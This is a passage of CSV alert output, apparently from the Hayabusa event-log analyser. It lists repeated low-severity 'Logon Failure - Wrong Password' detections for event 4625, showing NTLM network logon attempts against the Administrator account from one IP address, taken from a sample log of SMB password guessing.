NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: 